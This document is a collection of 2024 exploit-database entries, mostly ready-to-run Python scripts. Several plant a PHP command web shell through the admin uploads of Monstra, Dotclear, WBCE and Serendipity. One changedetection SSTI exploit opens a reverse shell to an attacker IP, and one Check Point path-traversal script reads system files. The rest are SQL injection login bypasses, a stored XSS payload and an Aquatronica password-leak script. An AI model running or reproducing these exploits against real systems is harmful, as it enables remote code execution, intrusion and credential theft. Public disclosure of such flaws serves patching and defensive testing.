<pre><code># Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)<br /># Date: 05.05.2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://monstra.org/<br /># Software Link: https://monstra.org/monstra-3.0.4.zip<br /># Version: 3.0.4<br /># Tested on: MacOS<br /><br />import requests<br />import random<br />import string<br />import time<br />import re<br />import sys<br /><br />if len(sys.argv) < 4:<br />print("Usage: python3 script.py <url> <username> <password>")<br />sys.exit(1)<br /><br />base_url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br /><br />session = requests.Session()<br /><br />login_url = f'{base_url}/admin/index.php?id=dashboard'<br />login_data = {<br />'login': username,<br />'password': password,<br />'login_submit': 'Log+In'<br />}<br /><br />filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=<br />5))<br /><br />print("Logging in...")<br />response = session.post(login_url, data=login_data)<br /><br />if 'Dashboard' in response.text:<br />print("Login successful")<br />else:<br />print("Login failed")<br />exit()<br /><br />time.sleep(3)<br /><br />edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'<br />response = session.get(edit_url) # CSRF token bulmak için edit sayfasına<br />erişim<br /><br />token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="<br />(.*?)"', response.text)<br />if token_search:<br />token = token_search.group(1)<br />else:<br />print("CSRF token could not be found.")<br />exit()<br /><br />content = '''<br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br />if(isset($_GET['cmd']))<br />{<br />system($_GET['cmd']);<br />}<br />?><br /></pre><br /></body><br /></html><br />'''<br /><br />edit_data = {<br 
/>'csrf': token,<br />'name': filename,<br />'content': content,<br />'add_file': 'Save'<br />}<br /><br />print("Preparing shell...")<br />response = session.post(edit_url, data=edit_data)<br />time.sleep(3)<br /><br />if response.status_code == 200:<br />print(f"Your shell is ready: {base_url}/public/themes/default/(unknown)<br />.chunk.php")<br />else:<br />print("Failed to prepare shell.")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 26.04.2024<br /># Vendor Homepage: https://git.dotclear.org/explore/repos<br /># Software Link:<br />https://github.com/dotclear/dotclear/archive/refs/heads/master.zip<br /># Tested Version: v2.29 (latest)<br /># Tested on: MacOS<br /><br />import requests<br />import time<br />import random<br />import string<br />from bs4 import BeautifulSoup<br /><br />def generate_filename(extension=".inc"):<br />return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +<br />extension<br /><br />def get_csrf_token(response_text):<br />soup = BeautifulSoup(response_text, 'html.parser')<br />token = soup.find('input', {'name': 'xd_check'})<br />return token['value'] if token else None<br /><br />def login(base_url, username, password):<br />print("Exploiting...")<br />time.sleep(1)<br />print("Logging in...")<br />time.sleep(1)<br />session = requests.Session()<br />login_data = {<br />"user_id": username,<br />"user_pwd": password<br />}<br />login_url = f"{base_url}/admin/index.php?process=Auth"<br />login_response = session.post(login_url, data=login_data)<br />if "Logout" in login_response.text:<br />print("Login Successful!")<br />return session<br />else:<br />print("Login Failed!")<br />return None<br /><br />def upload_file(session, base_url, filename):<br />print("Shell Preparing...")<br />time.sleep(1)<br />boundary = "---------------------------376201441124932790524235275389"<br />headers = {<br />"Content-Type": f"multipart/form-data; boundary={boundary}",<br />"X-Requested-With": "XMLHttpRequest"<br />}<br />csrf_token = get_csrf_token(session.get(f"{base_url}<br />/admin/index.php?process=Media").text)<br />payload = (<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"<br />f"2097152\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; 
name=\"xd_check\"\r\n\r\n"<br />f"{csrf_token}\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"(unknown)<br />\"\r\n"<br />f"Content-Type: image/jpeg\r\n\r\n"<br />"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo<br />basename($_SERVER['PHP_SELF']); ?>\">\n"<br />"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input<br />type=\"SUBMIT\" value=\"Execute\">\n"<br />"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}<br />\n?>\n</pre>\n</body>\n</html>\r\n"<br />f"--{boundary}--\r\n"<br />)<br />upload_response = session.post(f"{base_url}<br />/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",<br />headers=headers, data=payload.encode('utf-8'))<br /><br />if upload_response.status_code == 200:<br />print(f"Your Shell is Ready: {base_url}/public/(unknown)")<br />else:<br />print("Exploit Failed!")<br /><br />def main(base_url, username, password):<br />filename = generate_filename()<br />session = login(base_url, username, password)<br />if session:<br />upload_file(session, base_url, filename)<br /><br />if __name__ == "__main__":<br />import sys<br />if len(sys.argv) != 4:<br />print("Usage: python script.py <siteurl> <username> <password>")<br />else:<br />base_url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br />main(base_url, username, password)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)<br /># Date: 3/5/2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://wbce-cms.org/<br /># Software Link:<br />https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip<br /># Version: 1.6.2<br /># Tested on: MacOS<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import sys<br />import time<br /><br />def login(url, username, password):<br />print("Logging in...")<br />time.sleep(3)<br />with requests.Session() as session:<br />response = session.get(url + "/admin/login/index.php")<br />soup = BeautifulSoup(response.text, 'html.parser')<br />form = soup.find('form', attrs={'name': 'login'})<br />form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in<br />form.find_all('input') if input_tag.get('type') != 'submit'}<br /># Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle<br />form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =<br />username<br />form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =<br />password<br />post_response = session.post(url + "/admin/login/index.php", data=form_data)<br />if "Administration" in post_response.text:<br />print("Login successful!")<br />time.sleep(3)<br />return session<br />else:<br />print("Login failed.")<br />print("Headers received:", post_response.headers)<br />print("Response content:", post_response.text[:500]) # İlk 500 karakter<br />return None<br /><br />def upload_file(session, url):<br /># Dosya içeriğini ve adını belirleyin<br />print("Shell preparing...")<br />time.sleep(3)<br />files = {'upload[]': ('shell.inc',"""<html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br />if(isset($_GET['cmd']))<br />{<br />system($_GET['cmd']);<br />}<br 
/>?><br /></pre><br /></body><br /></html>""", 'application/octet-stream')}<br />data = {<br />'reqid': '18f3a5c13d42c5',<br />'cmd': 'upload',<br />'target': 'l1_Lw',<br />'mtime[]': '1714669495'<br />}<br />response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",<br />files=files, data=data)<br />if response.status_code == 200:<br />print("Your Shell is Ready: " + url + "/media/shell.inc")<br />else:<br />print("Failed to upload file.")<br />print(response.text)<br /><br />if __name__ == "__main__":<br />url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br />session = login(url, username, password)<br />if session:<br />upload_file(session, url)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 26.04.2024<br /># Vendor Homepage: https://docs.s9y.org/<br /># Software Link:https://www.s9y.org/latest<br /># Tested Version: v2.5.0 (latest)<br /># Tested on: MacOS<br /><br />import requests<br />import time<br />import random<br />import string<br />from bs4 import BeautifulSoup<br /><br />def generate_filename(extension=".inc"):<br />return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +<br />extension<br /><br />def get_csrf_token(response):<br />soup = BeautifulSoup(response.text, 'html.parser')<br />token = soup.find('input', {'name': 'serendipity[token]'})<br />return token['value'] if token else None<br /><br />def login(base_url, username, password):<br />print("Logging in...")<br />time.sleep(2)<br />session = requests.Session()<br />login_page = session.get(f"{base_url}/serendipity_admin.php")<br />token = get_csrf_token(login_page)<br />data = {<br />"serendipity[action]": "admin",<br />"serendipity[user]": username,<br />"serendipity[pass]": password,<br />"submit": "Login",<br />"serendipity[token]": token<br />}<br />headers = {<br />"Content-Type": "application/x-www-form-urlencoded",<br />"Referer": f"{base_url}/serendipity_admin.php"<br />}<br />response = session.post(f"{base_url}/serendipity_admin.php", data=data,<br />headers=headers)<br />if "Add media" in response.text:<br />print("Login Successful!")<br />time.sleep(2)<br />return session<br />else:<br />print("Login Failed!")<br />return None<br /><br />def upload_file(session, base_url, filename, token):<br />print("Shell Preparing...")<br />time.sleep(2)<br />boundary = "---------------------------395233558031804950903737832368"<br />headers = {<br />"Content-Type": f"multipart/form-data; boundary={boundary}",<br />"Referer": f"{base_url}<br />/serendipity_admin.php?serendipity[adminModule]=media"<br />}<br />payload = (<br 
/>f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"<br />f"{token}\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"<br />f"admin\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"<br />f"media\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"<br />f"add\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";<br />filename=\"(unknown)\"\r\n"<br />f"Content-Type: text/html\r\n\r\n"<br />"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo<br />basename($_SERVER['PHP_SELF']); ?>\">\n"<br />"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input<br />type=\"SUBMIT\" value=\"Execute\">\n"<br />"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}<br />\n?>\n</pre>\n</body>\n</html>\r\n"<br />f"--{boundary}--\r\n"<br />)<br /><br />response = session.post(f"{base_url}<br />/serendipity_admin.php?serendipity[adminModule]=media", headers=headers,<br />data=payload.encode('utf-8'))<br />if f"File (unknown) successfully uploaded as" in response.text:<br />print(f"Your shell is ready: {base_url}/uploads/(unknown)")<br />else:<br />print("Exploit Failed!")<br /><br />def main(base_url, username, password):<br />filename = generate_filename()<br />session = login(base_url, username, password)<br />if session:<br />token = get_csrf_token(session.get(f"{base_url}<br />/serendipity_admin.php?serendipity[adminModule]=media"))<br />upload_file(session, base_url, filename, token)<br /><br />if __name__ == "__main__":<br />import sys<br />if len(sys.argv) != 4:<br />print("Usage: python script.py <siteurl> <username> <password>")<br />else:<br />main(sys.argv[1], sys.argv[2], sys.argv[3])<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)<br /># Date: 5-26-2024<br /># Exploit Author: Zach Crosman (zcrosman)<br /># Vendor Homepage: changedetection.io<br /># Software Link: https://github.com/dgtlmoon/changedetection.io<br /># Version: <= 0.45.20<br /># Tested on: Linux<br /># CVE : CVE-2024-32651<br /><br />from pwn import *<br />import requests<br />from bs4 import BeautifulSoup<br />import argparse<br /><br />def start_listener(port):<br /> listener = listen(port)<br /> print(f"Listening on port {port}...")<br /> conn = listener.wait_for_connection()<br /> print("Connection received!")<br /> context.newline = b'\r\n'<br /> # Switch to interactive mode<br /> conn.interactive()<br /><br />def add_detection(url, listen_ip, listen_port, notification_url=''):<br /> session = requests.Session()<br /> <br /> # First request to get CSRF token<br /> request1_headers = {<br /> "Cache-Control": "max-age=0",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Accept-Language": "en-US,en;q=0.9",<br /> "Connection": "close"<br /> }<br /><br /> response = session.get(url, headers=request1_headers)<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> csrf_token = soup.find('input', {'name': 'csrf_token'})['value']<br /> print(f'Obtained CSRF token: {csrf_token}')<br /><br /> # Second request to submit the form and get the redirect URL<br /> add_url = f"{url}/form/add/quickwatch"<br /> add_url_headers = { # Define add_url_headers here<br /> "Origin": url,<br /> "Content-Type": "application/x-www-form-urlencoded"<br /> }<br /> add_url_data = {<br /> "csrf_token": csrf_token,<br /> "url": "https://reddit.com/r/baseball",<br /> "tags": '',<br /> "edit_and_watch_submit_button": "Edit > Watch",<br /> "processor": "text_json_diff"<br /> }<br 
/><br /> post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)<br /><br /> # Extract the URL from the Location header<br /> if 'Location' in post_response.headers:<br /> redirect_url = post_response.headers['Location']<br /> print(f'Redirect URL: {redirect_url}')<br /> else:<br /> print('No redirect URL found')<br /> return<br /><br /> # Third request to add the changedetection url with ssti in notification config<br /> save_detection_url = f"{url}{redirect_url}"<br /> save_detection_headers = { # Define save_detection_headers here<br /> "Referer": redirect_url,<br /> "Cookie": f"session={session.cookies.get('session')}"<br /> }<br /><br /> save_detection_data = {<br /> "csrf_token": csrf_token,<br /> "url": "https://reddit.com/r/all",<br /> "title": '',<br /> "tags": '',<br /> "time_between_check-weeks": '',<br /> "time_between_check-days": '',<br /> "time_between_check-hours": '',<br /> "time_between_check-minutes": '',<br /> "time_between_check-seconds": '30',<br /> "filter_failure_notification_send": 'y',<br /> "fetch_backend": 'system',<br /> "webdriver_delay": '',<br /> "webdriver_js_execute_code": '',<br /> "method": 'GET',<br /> "headers": '',<br /> "body": '',<br /> "notification_urls": notification_url,<br /> "notification_title": '',<br /> "notification_body": f"""<br /> {{% for x in ().__class__.__base__.__subclasses__() %}}<br /> {{% if "warning" in x.__name__ %}}<br /> {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}<br /> {{% endif %}}<br /> {{% endfor %}}<br /> """,<br /> "notification_format": 'System default',<br /> "include_filters": '',<br /> "subtractive_selectors": '',<br /> "filter_text_added": 'y',<br /> "filter_text_replaced": 'y',<br /> "filter_text_removed": 'y',<br /> "trigger_text": '',<br /> "ignore_text": 
'',<br /> "text_should_not_be_present": '',<br /> "extract_text": '',<br /> "save_button": 'Save'<br /> }<br /> final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)<br /><br /> print('Final request made.')<br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Add detection and start listener')<br /> parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')<br /> parser.add_argument('--port', type=int, help='Port for the listener', default=4444)<br /> parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')<br /> parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')<br /> args = parser.parse_args()<br /><br /><br /> add_detection(args.url, args.ip, args.port, args.notification)<br /> start_listener(args.port)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Online Payment Hub System - SQLi Authentication Bypass<br /># Date: 29.05.2024<br /># Exploit Author: Hamit Avşar<br /># Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code<br /># Version: 1.0<br /># Tested on: Windows 11, Kali Linux<br /># Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.<br /><br />Steps To Reproduce:<br />1 - Go to the login page http://localhost/oph/admin/login.php<br />2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.<br />3 - Click on "Login" button and you are logged in as administrator.<br /><br />PoC<br /><br />Request<br /><br />POST /oph/classes/Login.php?f=login HTTP/1.1<br />Host: localhost<br />Content-Length: 42<br />sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/oph/admin/login.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i<br />Connection: close<br /><br />username=admin'+or+'1'%3D'1&password=hamit<br /><br />--------------------------------------------------------------------------------------------------------------------------------<br /><br />response<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 29 May 2024 17:15:28 GMT<br />Server: 
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30<br />X-Powered-By: PHP/8.0.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Access-Control-Allow-Origin: *<br />Content-Length: 20<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />{"status":"success"}<br /><br /><br /><br /></code></pre>
<pre><code>Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection<br />Date: 14 Apr 2024<br />Exploit Author: Ivan Spiridonov (xbz0n)<br />Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135<br />Version: 2.0.3<br />Tested on: Ubuntu 20.04<br />CVE: CVE-2024-32136<br /><br />SQL Injection<br /><br />SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.<br /><br />Affected Components<br /><br />Plugin: BWL Advanced FAQ Manager<br />Version: 2.0.3<br />Affected Parameter: 'date_range'<br />Affected Page: /wp-admin/edit.php<br /><br />Description<br /><br />The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. 
Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.<br /><br />Proof of Concept<br /><br />Manual Exploitation<br /><br />The following GET request demonstrates the vulnerability:<br /><br />GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics<br />Connection: close<br />Cookie: [Relevant Cookies]<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.<br /><br />Recommendations<br /><br />BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.<br /> <br /></code></pre>
<pre><code># Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS)<br /># Date: 22/5/2024<br /># Exploit Author: Gabriel Felipe<br /># Vendor Homepage: https://itssglobal.com<br /># Software Link: https://itssglobal.com/index.php/imlog/<br /># Version: 1.307<br /># Tested on: Firefox and Chrome Browsers<br /># Patched Version: 1.308<br /># Category: Web Application<br /># PoC:<br /><br />iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious JavaScript into a user account they control, so that when an administrator opens "User Maintenance" the code executes; this could be used to create new administrator accounts, resulting in privilege escalation.<br /><br />1. Log in to the user account<br />2. Go to Setup > "User Maintenance"<br />3. Click on "Search" and then select your UserID.<br />4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>`<br />5. Click on "Save"<br />6. Refresh the page; the XSS will be triggered.<br /><br /></code></pre>
<pre><code># Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)<br /># Exploit Author: Yesith Alvarez<br /># Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336<br /># Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 <br /># CVE : CVE-2024-24919<br /><br />from requests import Request, Session<br />import sys<br />import json<br /><br /><br /><br />def title():<br /> print('''<br /> <br /> _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ <br /> / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ <br /> | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |<br /> | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, |<br /> | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / <br /> \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ <br /> <br /> <br /> <br /> <br />Author: Yesith Alvarez<br />Github: https://github.com/yealvarez<br />Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/<br /> ''') <br /><br />def exploit(url, path):<br /> url = url + '/clients/MyCRL'<br /> data = "aCSHELL/../../../../../../../../../../.."+ path<br /> headers = { <br /> 'Connection': 'keep-alive',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'<br /> }<br /> s = Session()<br /> req = Request('POST', url, data=data, headers=headers)<br /> prepped = req.prepare()<br /> #del prepped.headers['Content-Type']<br /> resp = s.send(prepped,<br /> verify=False,<br /> timeout=15<br /> ) <br /> print(prepped.headers)<br /> print(url)<br /> print(resp.headers)<br /> print(resp.status_code)<br /><br /><br />if __name__ == '__main__':<br /> title()<br /> if(len(sys.argv) < 3):<br /> print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))<br /> print('[+] EXAMPLE: python3 %s 
https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) <br /> exit(0)<br /> else:<br /> exploit(sys.argv[1],sys.argv[2])<br /> <br /><br /></code></pre>
May 31, 2024 — Check Point Security Gateway Information Disclosure
Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.
<pre><code>#!/usr/bin/env python<br /># -*- coding: utf-8 -*-<br />#<br />#<br /># Aquatronica Control System 5.1.6 Passwords Leak Vulnerability<br />#<br />#<br /># Vendor: Aquatronica s.r.l.<br /># Product web page: https://www.aquatronica.com<br /># Affected version: Firmware: 5.1.6<br /># Web: 2.0<br />#<br /># Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy<br /># to use, allowing you to control all the electrical devices in<br /># an aquarium and to monitor all their parameters; it can be used<br /># for soft water aquariums, salt water aquariums or both simultaneously.<br />#<br /># Desc: The tcp.php endpoint on the Aquatronica controller is exposed<br /># to unauthenticated attackers over the network. This vulnerability<br /># allows remote attackers to send a POST request which can reveal<br /># sensitive configuration information, including plaintext passwords.<br /># This can lead to unauthorized access and control over the aquarium<br /># controller, compromising its security and potentially allowing attackers<br /># to manipulate its settings.<br />#<br /># Tested on: Apache/2.0.54 (Unix)<br /># PHP/5.4.17<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2024-5824<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php<br />#<br />#<br /># 04.05.2024<br />#<br /><br />import requests, html, re, sys, time<br />from urllib.parse import unquote<br /><br />program = "TCP"<br />command = "ws_get_network_cfg"<br />function_id = "TCP_XML_REQUEST"<br /><br />print("""<br /> _________ . .<br /> (.. \_ , |\ /|<br /> \ O \ /| \ \/ /<br /> \______ \/ | \ / <br /> vvvv\ \ | / |<br /> \^^^^ == \_/ |<br /> `\_ === \. 
|<br /> / /\_ \ / |<br /> |/ \_ \| /<br />___ ______________\________/________aquatronica_0day___<br /> | |<br /> | |<br /> | |<br />""")<br /><br />if len(sys.argv) != 2:<br /> print("Usage: python aqua.py <ip:port>")<br /> sys.exit(1)<br /><br />ip = sys.argv[1]<br />url = f"http://{ip}/{program.lower()}.php"<br /><br />post_data = {'function_id' : function_id.lower(),<br /> 'command' : command.upper()}<br /><br />r = requests.post(url, data=post_data)<br /><br />if r.status_code == 200:<br /> r_d = unquote(r.text)<br /> f_d_r = html.unescape(r_d)<br /> regex = r'pwd="([^"]+)"'<br /> rain = re.findall(regex, f_d_r)<br /><br /> for drops in rain:<br /> print(' ',drops)<br /> time.sleep(0.5)<br />else:<br /> print(f"Dry season! {r.status_code}")<br /></code></pre>